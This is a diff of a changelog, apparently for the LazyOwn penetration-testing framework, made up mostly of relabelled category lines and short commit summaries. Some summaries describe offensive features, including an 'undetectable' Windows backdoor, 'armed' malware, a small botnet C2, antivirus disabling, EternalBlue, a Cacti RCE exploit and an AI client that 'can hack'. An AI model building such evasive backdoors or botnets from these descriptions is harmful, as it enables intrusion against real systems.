-Otros
+Pruebas
+Otros
- test(test): no test Version: release/0.1.63 testing Modified
@@ -5981,8 +6007,8 @@
Otros
Hora: 1729039188
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): test Version: release/0.1.63 test Modified file(s):-
@@ -5994,8 +6020,8 @@
Otros
Hora: 1728971840
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): deply Version: release/0.1.63 new Modified file(s):-
@@ -6006,8 +6032,8 @@
Otros
Hora: 1728971576
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): deploy Version: release/0.1.63 Modified file(s):-
@@ -6021,7 +6047,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): hashs Version: release/0.1.63 new logic of get
@@ -6034,8 +6060,8 @@
Otros
Hora: 1728890837
-Otros
Otros
+Otros
- feature(feat): new commands documented at COMMANDS.md Version:
@@ -6049,8 +6075,8 @@
Otros
Hora: 1728795132
-Otros
Otros
+Otros
- feature(feat): new commands like emp3r0r,
@@ -6070,7 +6096,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): refactor of users.txt Version: release/0.1.61
@@ -6085,7 +6111,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): refactor lazy_ruberdigispark isnto duckyspark
@@ -6100,7 +6126,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): trasnlated nmap script Version: release/0.1.61 and add
@@ -6112,7 +6138,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): nmap Version: release/0.1.61 nmap script was
@@ -6124,15 +6150,15 @@
Otros
Hora: 1728618761
-Otros
Otros
+Otros
Nuevas características
-Otros
+Otros
- feat(feat): New Feature Automate Arduino Attacks or AAA the command
@@ -6146,7 +6172,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): finger_user_enum Version: release/0.1.60 new
@@ -6160,7 +6186,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): trasnform Version: release/0.1.59 command documented at
@@ -6173,7 +6199,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): bug fixing Version: release/0.1.58 int the dunction do_ssh
@@ -6186,7 +6212,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): tags Version: release/0.1.57 xd Modified file(s):-
@@ -6197,7 +6223,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): refactor de find y nc Version: release/0.1.56
@@ -6210,8 +6236,8 @@
Otros
Hora: 1728364614
-Otros
Otros
+Otros
- feature(feature & refactor): new commands and refactor Version:
@@ -6229,7 +6255,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): automsf Version: release/0.1.55 new command documented
@@ -6242,8 +6268,8 @@
Otros
Hora: 1728195928
-Pruebas
-Otros
+Pruebas
+Otros
- test(new machine return): is a nice machine :P Version:
@@ -6255,8 +6281,8 @@
Otros
Hora: 1728191962
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): new machine yummy.htb found a command in find to reverse
@@ -6272,7 +6298,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): new attack mfscosole automated Version: release/0.1.54
@@ -6286,8 +6312,8 @@
Otros
Hora: 1728103452
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): testing DEPLOY.sh script Version: release/0.1.53 to
@@ -6301,7 +6327,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): nueva documentacion comando evidence Version:
@@ -6313,8 +6339,8 @@
Otros
Hora: 1728101925
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): lazyown infinite glitch storage Version: release/0.1.53
@@ -6327,7 +6353,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): fix in find command Version: release/0.1.53 command find
@@ -6339,7 +6365,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): refactor de credentials de evilwinrm de psexec,
@@ -6354,7 +6380,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): eternalblue Version: release/0.1.52 and scanner in
@@ -6366,8 +6392,8 @@
Otros
Hora: 1727757752
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): deleting users from ctf game from repo Version:
@@ -6379,8 +6405,8 @@
Otros
Hora: 1727751984
-Otros
Otros
+Otros
- feature(feat): new commands and functionalities Version:
@@ -6394,7 +6420,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): smbclient refactor, cme refactor, netexec,
@@ -6414,7 +6440,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): new command Shadowsocks Version: release/0.1.50 with
@@ -6426,8 +6452,8 @@
Otros
Hora: 1727315985
-Otros
Otros
+Otros
- feature(feat): now we are vip Version: release/0.1.49 Modified
@@ -6440,7 +6466,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): new commands documented at COMMANDS.md Version:
@@ -6453,8 +6479,8 @@
Otros
Hora: 1727053941
-Pruebas
-Otros
+Pruebas
+Otros
- test(testing): some test and new resources and externals scripst to
@@ -6468,7 +6494,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): new cool stuff xD Version: release/0.1.47 parse id rsa
@@ -6481,7 +6507,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(win backdoor): undetectable Version: release/0.1.46 handcrafted
@@ -6494,7 +6520,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): c2 insecure filename Version: release/0.1.45 resolved
@@ -6506,7 +6532,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): documented resources, and externals, and one command
@@ -6520,8 +6546,8 @@
Otros
Hora: 1726294213
-Otros
Otros
+Otros
- feature(new commands): documented at COMMANDS.md Version:
@@ -6536,8 +6562,8 @@
Otros
Hora: 1726123063
-Otros
Otros
+Otros
- feature(feat): new commands: scarecrow, createmail, eyewitness,
@@ -6551,8 +6577,8 @@
Otros
Hora: 1726033595
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): install Version: release/0.1.42 dou you seaw [3~pip
@@ -6564,8 +6590,8 @@
Otros
Hora: 1726031410
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): install Version: release/0.1.42 testing… Modified
@@ -6578,7 +6604,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): graph Version: release/0.1.42 integrated at index2.html
@@ -6591,7 +6617,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): 2 new commands Version: release/0.1.41 shellfire,
@@ -6603,8 +6629,8 @@
Otros
Hora: 1725925520
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): install testing Version: release/0.1.40 reported by user
@@ -6616,7 +6642,7 @@
Otros
Correcciones urgentes
-Otros
+Otros
- hotfix(hotfix): install wa broken Version: release/0.1.40 infinite
@@ -6627,8 +6653,8 @@
Otros
Hora: 1725884702
-Pruebas
-Otros
+Pruebas
+Otros
- test(testing): emire Version: release/0.1.39 empire xD Modified
@@ -6640,8 +6666,8 @@
Otros
Hora: 1725784522
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): veil Version: release/0.1.39 new evasion tool testing
@@ -6653,8 +6679,8 @@
Otros
Hora: 1725781606
-Otros
Otros
+Otros
- feature(feat): now tord, trace, and generatedic to generate
@@ -6668,8 +6694,8 @@
Otros
Hora: 1725687669
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): testing new feature tord Version: release/0.1.38
@@ -6681,8 +6707,8 @@
Otros
Hora: 1725607743
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): ivy shellcodes test Version: release/0.1.38 new command
@@ -6695,7 +6721,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): new alias Version: release/0.1.38 new alias tor
@@ -6708,7 +6734,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): corrections in text Version: release/0.1.38 and some
@@ -6720,7 +6746,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): new links Version: release/0.1.38 automatic download
@@ -6733,7 +6759,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): better docs Version: release/0.1.38 is zen now :)
@@ -6746,7 +6772,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(fet): msfpc Version: release/0.1.38 automation Modified
@@ -6758,8 +6784,8 @@
Otros
Hora: 1725340514
-Otros
Otros
+Otros
- feature(feat): comandos nuevos documentados en commands.md Version:
@@ -6771,8 +6797,8 @@
Otros
Hora: 1725334465
-Otros
Otros
+Otros
- feature(feat): new command apache_users & new options -p to use
@@ -6789,7 +6815,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): documented malwarebazar Version: release/0.1.35 Fetches
@@ -6803,7 +6829,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): documentating Version: release/0.1.35 functions dacledit
@@ -6815,8 +6841,8 @@
Otros
Hora: 1725164019
-Otros
Otros
+Otros
- feature(feat): Nuevos comandos documentados en COMMANDS.md Version:
@@ -6835,8 +6861,8 @@
Otros
Hora: 1725099704
-Otros
Otros
+Otros
- feature(feat): nuevos comandos documetados en COMMANDS.md Version:
@@ -6850,8 +6876,8 @@
Otros
Hora: 1725075210
-Otros
Otros
+Otros
- feature(feat): nuevos comandos documentados en COMMANDS.md Version:
@@ -6865,7 +6891,7 @@
Otros
Correcciones urgentes
-Otros
+Otros
- hotfix(hotfix): deleted the insecure chat Version: release/0.1.32
@@ -6877,8 +6903,8 @@
Otros
Hora: 1725001084
-Otros
Otros
+Otros
- feature(feat): Nuevos comandos documentados en COMMANDS.md Version:
@@ -6892,8 +6918,8 @@
Otros
Hora: 1724900538
-Otros
Otros
+Otros
- feature(feat): Nuevos comandos documentados en COMMANDS.md Version:
@@ -6908,7 +6934,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): some fixes in c2 Version: release/0.1.29 now curl attack
@@ -6920,7 +6946,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(kick): to kick from net some ip Version: release/0.1.28 seend
@@ -6933,8 +6959,8 @@
Otros
Hora: 1724734432
-Otros
Otros
+Otros
- feature(new command c2 documentad at COMMANDS.md): a little botnet
@@ -6948,7 +6974,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix auto exploit cacti rce logged): now the attack work
@@ -6960,8 +6986,8 @@
Otros
Hora: 1724653124
-Otros
Otros
+Otros
- feature(new commands docummented at COMMANDS.md): waybackmachine,
@@ -6975,8 +7001,8 @@
Otros
Hora: 1724556511
-Otros
Otros
+Otros
- feature(2 new attacks): docummented at COMMANDS.md Version:
@@ -6988,8 +7014,8 @@
Otros
Hora: 1724527338
-Pruebas
-Otros
+Pruebas
+Otros
- test(new machine): monitorsthree.htb Version: release/0.1.23
@@ -7001,7 +7027,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(new payload): in msfvenom Version: release/0.1.23 :) java
@@ -7013,7 +7039,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(new feature): padbuster Version: release/0.1.23 new command
@@ -7026,7 +7052,7 @@
Otros
Documentación
-Otros
+Otros
- docs(documentacion): nueva versiòn en la web reflejada en el banner
@@ -7038,7 +7064,7 @@
Otros
Documentación
-Otros
+Otros
- docs(new documentation): better documentation to commands and utils
@@ -7051,7 +7077,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(new feat in createdll): new option 3 to run automate create dll
@@ -7065,7 +7091,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): blazormalware corrected now functional and armed :)
@@ -7079,7 +7105,7 @@
Otros
Documentación
-Otros
+Otros
- docs(Lang): Translate README.md to English, enhancing clarity and
@@ -7099,7 +7125,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(malware new): blazor malware Version: release/0.1.20 create
@@ -7112,7 +7138,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): se agrega la libreria colors en modules para
@@ -7127,8 +7153,8 @@
Otros
Hora: 1724134817
-Otros
Otros
+Otros
- feature(feat): dos comandos nuevos, skipfish y createdll, nuevo
@@ -7142,7 +7168,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): create new command shellcode, run lazymsfvenom modified
@@ -7156,7 +7182,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(new feat): new funcionality in proxy command, hexdump on
@@ -7170,7 +7196,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): new prompt Version: release/0.1.16 now show the url of
@@ -7182,7 +7208,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): new command set_proxychains Version: release/0.1.15
@@ -7195,7 +7221,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(bug fixing): bug fixing in vars of DEPLOY.sh Version:
@@ -7206,8 +7232,8 @@
Otros
2024 -0400 Hora: 1724013443
-Otros
Otros
+Otros
- feature(new payload in msfvenom android): new options in msf rev
@@ -7220,7 +7246,7 @@
Otros
Documentación
-Otros
+Otros
- docs(documented): agradecimientos Version: release/0.1.12 a ✌ el
@@ -7232,7 +7258,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(implement sicat libs): to ss command Version: release/0.1.12
@@ -7247,7 +7273,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(some fixes): html and new patreon :) Version: release/0.1.11 :)
@@ -7258,8 +7284,8 @@
Otros
Hora: 1723859535
-Otros
Otros
+Otros
- feature(new tools): new commands, new payloads in find, new cves,
@@ -7274,7 +7300,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(new feature): new command finalrecon docuemnted at COMMANDS.md
@@ -7288,7 +7314,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(command): new commando swaks to abuse of smtp Version:
@@ -7301,7 +7327,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix in vpn): new machine Version: release/0.1.7 chenges in
@@ -7312,8 +7338,8 @@
Otros
Hora: 1723780696
-Pruebas
-Otros
+Pruebas
+Otros
- test(deleted files): index.sh y dump_readme.sh Version:
@@ -7326,7 +7352,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor DEPLOY, sessionstrace): se crea todo en un solo
@@ -7341,8 +7367,8 @@
Otros
Hora: 1723767303
-Otros
Otros
+Otros
- feature(sessionssh y sessionsshstrace): nuevos comandos documentados
@@ -7355,8 +7381,8 @@
Otros
Hora: 1723763173
-Pruebas
-Otros
+Pruebas
+Otros
- test(testing Changelog): new method to create changelog Version:
@@ -7368,7 +7394,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(lazyscripts): se crea el comando y el directorio lazyscripts el
@@ -7381,8 +7407,8 @@
Otros
Hora: 1723760162
-Otros
Otros
+Otros
- feature(nuevos recursos, comandos, archivos tool para pwntomate): se
@@ -7400,7 +7426,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(tool): nuevo tool a pwntomate medusa.tool Version:
@@ -7412,7 +7438,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(medusa): nueco comando Version: release/0.1.2 para crackear
@@ -7424,7 +7450,7 @@
Otros
Documentación
-Otros
+Otros
- docs(changelog): reload Version: release/0.1.1 deleted -
@@ -7436,7 +7462,7 @@
Otros
Documentación
-Otros
+Otros
- docs(history): reload the history deleted by error holly git :P
@@ -7448,7 +7474,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): fix Version: release/0.1.1 fix - DEPLOY.sh - README.md -
@@ -7459,7 +7485,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): versionamiento Version: - DEPLOY.sh - README.md -
@@ -7470,7 +7496,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): fix en los tags Version: - README.md - docs/README.html -
@@ -7481,7 +7507,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(version file): Version: - README.md - docs/README.html -
@@ -7492,7 +7518,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(pandoc): command Version: bad arguments - DEPLOY.sh - README.md
@@ -7503,7 +7529,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): changelog Version: :D - DEPLOY.sh - README.md -
@@ -7514,7 +7540,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fixing): fixin bug in formating of changelog Version: :D -
@@ -7525,7 +7551,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fixing): fixing semantic version Version: implemented -
@@ -7537,7 +7563,7 @@
Otros
Nuevo Release
-Otros
+Otros
- release(release): tipo release Version: probandoe l tipo release -
@@ -7548,7 +7574,7 @@
Otros
Correcciones urgentes
-Otros
+Otros
- hotfix(error en parametro): deploy en el pandocpara generar
@@ -7560,7 +7586,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(cambio en el versionamiento semantico): se agregan release y
@@ -7573,7 +7599,7 @@
Otros
Nuevo parche
-Otros
+Otros
- patch(patching): prueba de nuevos tipos de commits Version: en este
@@ -7583,8 +7609,8 @@
Otros
Hora: 1723703697
-Pruebas
-Otros
+Pruebas
+Otros
- test(testind): deploy Version: release/0.1.0 test LazyOwn on
@@ -7594,7 +7620,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(semantic versioning): se implementa el versionamiento semantico
@@ -7607,7 +7633,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(firma de commits con pgp): cree una firmita gpg para firmar los
@@ -7617,8 +7643,8 @@
Otros
Hora: 1723701172
-Otros
Otros
+Otros
- feature(test): testing deploy feature and semantic versioning
@@ -7628,8 +7654,8 @@
Otros
Hora: 1723701007
-Pruebas
-Otros
+Pruebas
+Otros
- test(deploy): testing deploy script Version: release/0.0.13 testing
@@ -7640,7 +7666,7 @@
Otros
Correcciones urgentes
-Otros
+Otros
- hotfix(bug in Deploy): not updated the index.html file in deploys
@@ -7651,8 +7677,8 @@
Otros
Hora: 1723699864
-Otros
Otros
+Otros
- feature(mejoras y fixes): - se agrega un pequeño diccionario en el
@@ -7666,7 +7692,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(add scripts): - adding scripts on sessions/win directory a nc
@@ -7678,7 +7704,7 @@
Otros
Documentación
-Otros
+Otros
- docs(add README.html to anchor tag in menu of index.html): - chenges
@@ -7690,7 +7716,7 @@
Otros
Documentación
-Otros
+Otros
- docs(mejora documentaciòn): se completan varios comandos con
@@ -7701,8 +7727,8 @@
Otros
Hora: 1723690831
-Otros
Otros
+Otros
- feature(cambios en script fast_run_as_r00t.sh): se agrega la opción
@@ -7715,7 +7741,7 @@
Otros
Documentación
-Otros
+Otros
- docs(test): bad tabs in index.html Version: release/0.0.13 LazyOwn
@@ -7725,7 +7751,7 @@
Otros
Documentación
-Otros
+Otros
- docs(cambio en index.html): tabulacion incorrecta del banner
@@ -7736,7 +7762,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): se cambia el nombre de readme.sh a
@@ -7747,8 +7773,8 @@
Otros
Hora: 1723671942
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): test Version: release/0.0.13 test LazyOwn on HackTheBox:
@@ -7757,8 +7783,8 @@
Otros
Hora: 1723671536
-Otros
Otros
+Otros
- feature(actualizador de readme.md): con los nuevos cambios desde los
@@ -7769,8 +7795,8 @@
Otros
Hora: 1723670843
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): new styles in html of documentation Version:
@@ -7780,8 +7806,8 @@
Otros
Hora: 1723669581
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): testing changelog Version: release/0.0.13 LazyOwn on
@@ -7790,8 +7816,8 @@
Otros
Hora: 1723669421
-Pruebas
-Otros
+Pruebas
+Otros
- test(testing): new changelog format Version: release/0.0.13 new
@@ -7801,8 +7827,8 @@
Otros
Hora: 1723668967
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): Version: release/0.0.13 test LazyOwn on HackTheBox:
@@ -7811,8 +7837,8 @@
Otros
Hora: 1723668932
-Pruebas
-Otros
+Pruebas
+Otros
- test(testeando): nuevo changelog Version: release/0.0.13 mejor
@@ -7822,8 +7848,8 @@
Otros
Hora: 1723668469
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): deploy Version: release/0.0.13 changes in changelog
@@ -7832,8 +7858,8 @@
Otros
2024 -0400 Hora: 1723667712
-Pruebas
-Otros
+Pruebas
+Otros
- test(testing): changelog Version: release/0.0.13 saltos de linea
@@ -7842,8 +7868,8 @@
Otros
2024 -0400 Hora: 1723667648
-Pruebas
-Otros
+Pruebas
+Otros
- test(tesing): saltos de linea en commit Version: release/0.0.13 :)
@@ -7853,7 +7879,7 @@
Otros
Documentación
-Otros
+Otros
- docs(class=“neon-text” on ul): :): release/0.0.13:)LazyOwn on
@@ -7862,8 +7888,8 @@
Otros
Hora: 1723665459
-Pruebas
-Otros
+Pruebas
+Otros
- test(commits con fecha y hora :P): probando el despliegue:
@@ -7873,8 +7899,8 @@
Otros
Hora: 1723665132
-Pruebas
-Otros
+Pruebas
+Otros
- test(test de index.html): testeando el despliegue automatizado del
@@ -7883,8 +7909,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Pruebas
-Otros
+Pruebas
+Otros
- test(test index.sh): se realizan cambios en index.sh:
@@ -7894,8 +7920,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Pruebas
-Otros
+Pruebas
+Otros
- test(testing): Testeando el flujo de trabajo en los despliegues
@@ -7904,8 +7930,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Otros
Otros
+Otros
- feature(versionamiento semantico en script de deploy): mejora en
@@ -7915,8 +7941,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Pruebas
-Otros
+Pruebas
+Otros
- test(test of –no-test): and lolcat on clock command :Phas now
@@ -7927,7 +7953,7 @@
Otros
Documentación
-Otros
+Otros
- docs(se agrega el change log al readme): tambien se ejecutan pruebas
@@ -7939,7 +7965,7 @@
Otros
Correcciones urgentes
-Otros
+Otros
- hotfix(fix in vpn): dont work with argumentsworks xD👽 LazyOwn on
@@ -7948,8 +7974,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Otros
Otros
+Otros
- feature(parametrizar el despliegue): se agrega el parametro –no-test
@@ -7959,8 +7985,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Pruebas
-Otros
+Pruebas
+Otros
- test(troubleshooting): deleting the tmp file but i cant sleep👽
@@ -7970,7 +7996,7 @@
Otros
Correcciones urgentes
-Otros
+Otros
- hotfix(delete qa command to option -c): bug: dont let beggin
@@ -7980,8 +8006,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Pruebas
-Otros
+Pruebas
+Otros
- test(despliegue): backup file del archivo lazyown creado en las
@@ -7993,8 +8019,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Pruebas
-Otros
+Pruebas
+Otros
- test(despliegue): de organizaciòn de archivos ovpn dentro del
@@ -8004,8 +8030,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Pruebas
-Otros
+Pruebas
+Otros
- test(testmeneitor): probando el workflow de desplieguees el body de
@@ -8015,8 +8041,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Otros
Otros
+Otros
- feature(nuevo creador de index.html): crea el html de manera
@@ -8027,8 +8053,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Otros
Otros
+Otros
- feature(mejora CHANGELOG.sh): ahora actualiza usando
@@ -8040,7 +8066,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(mejorando el tipo): cambio en el script CHANGELOG.shmejora la
@@ -8051,7 +8077,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): El cierre de una imagen en la documentación estaba mal
@@ -8061,22 +8087,22 @@
Otros
https://grisuno.github.io/LazyOwn/
-Otros
Otros
+Otros
- Nueva descripcion en el readme y probando el CHANGELOG.sh :)
-Otros
Otros
+Otros
- ahora el changelog a docs :D en formato html
-Otros
Otros
+Otros
- HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 Ahora
@@ -8087,8 +8113,8 @@
Otros
y CHANGELOG.sh :D 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
@@ -8096,8 +8122,8 @@
Otros
README.html madremia que comandazo 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
@@ -8105,24 +8131,24 @@
Otros
README.html madremia que comandazo 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
some changes in the web 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
comming soon tryhackme 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
@@ -8131,40 +8157,40 @@
Otros
readmeneitor.py :P 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 new
fancy proompt :) 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 bug
fixing 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429
👽👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
3ast3r366 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New
@@ -8172,8 +8198,8 @@
Otros
👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New
@@ -8181,8 +8207,8 @@
Otros
👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New
@@ -8190,31 +8216,31 @@
Otros
👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New
command launchpad to recon Linux OS 👽
-Otros
Otros
+Otros
- Merge pull request #27 from grisuno/clcthulhu-patch-1
Documentación
-Otros
+Otros
- docs(update readme description): change of the description; Update
README.md
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New
@@ -8222,40 +8248,40 @@
Otros
VERSION 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
mejorando la documentaciòn 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 new
commands rulencode, urldecode, y lynis documented at COMMANDS.md 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
command vpn now handle multiple ovpn files 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
command vpn now handle multiple ovpn files 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 new
@@ -8263,24 +8289,24 @@
Otros
hashcat, more soon :) 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 new
commands documented at COMMANDS.md
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429
Magicgardens is so insane but pwned :)
-Otros
Otros
+Otros
- 👽 new commands documented in COMMANDS.md or README.md and more
@@ -8288,8 +8314,8 @@
Otros
their own repo…
-Otros
Otros
+Otros
- 👽 new commands documented in COMMANDS.md or README.md and more
@@ -8297,302 +8323,302 @@
Otros
their own repo…
-Otros
Otros
+Otros
- 👽 new machine magic gardens insane machine because resource was
pwned and sea not was released yet
-Otros
Otros
+Otros
- 👽 bug fixing in createhash, new wrappers, chisel command updated
now can choice the payload, img2cookie new payloads
-Otros
Otros
+Otros
- 👽 bug fixing in createhash, new wrappers, chisel command updated
now can choice the payload, img2cookie new payloads
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- 👽 new tools for pwntomate :D
-Otros
Otros
+Otros
- 👽 new command img2cookie :)
-Otros
Otros
+Otros
- 👽 new command img2cookie :)
-Otros
Otros
+Otros
- 👽 new machine comprezzor.htb
-Otros
Otros
+Otros
- 👽 new script readmeneitor req updated
-Otros
Otros
+Otros
- 👽 new script readmeneitor to help me update the readme xD
-Otros
Otros
+Otros
- 👽 new command ssh 22 and if u have file sessions/credentials.txt
this will open ssh conection :)
-Otros
Otros
+Otros
- 👽 bug fixing and replace command nc with pwncatcs more fancy and
sharp :)
-Otros
Otros
+Otros
- 👽 bug fixing in wfuzz sub command wen you not pass the domain
-Otros
Otros
+Otros
- 👽 some changes in nmap script now discovery have template html too
and we have a little index2.html to navigate the reports.
-Otros
Otros
+Otros
- 👽 some littles changes :)
-Otros
Otros
+Otros
- 👽 new machine compiled :)
-Otros
Otros
+Otros
- 👽 new command disableav to create a aav.vbs to disable av if it’s
possible :)
-Otros
Otros
+Otros
- 👽 changing the command in venom :)
-Otros
Otros
+Otros
- 👽 holly jissus mist.htb now pwned with my user :P its rally insane
amount of work to pwn
-Otros
Otros
+Otros
- 👽 holly jissus mist.htb machine cost to me one week and my mental
health xD bu it’s pwned xD
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- 👽 chisel fix copy to clipboard commad bug …
-Otros
Otros
+Otros
- 👽 command list to update the readme: todo …
-Otros
Otros
+Otros
- 👽 no more prints ( 👽 we have 13 xD) now we have technologì we have
print_msg, print_error & print_warn :) so much pretty
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- 👽 new brothers commands, LazyOwn> winbase64payload and
asprevbase64 👽
-Otros
Otros
+Otros
- some roder to prints, not finished yet but the storm its cut the
electricity so commit….
-Otros
Otros
+Otros
- feat: somo testing and alias now you can run gpt alias :D
-Otros
Otros
+Otros
- feat: Now the GPT Client use Llama 70B and now can hack :) fixing
error path from json files :P
-Otros
Otros
+Otros
- feat: Now the GPT Client use Llama 70B and now can hack :)
-Otros
Otros
+Otros
- feat: more time to the nmap to finished and pyautomate
autostart
-Otros
Otros
+Otros
- feat: New stylesheet for Nmap reports, making them more professional
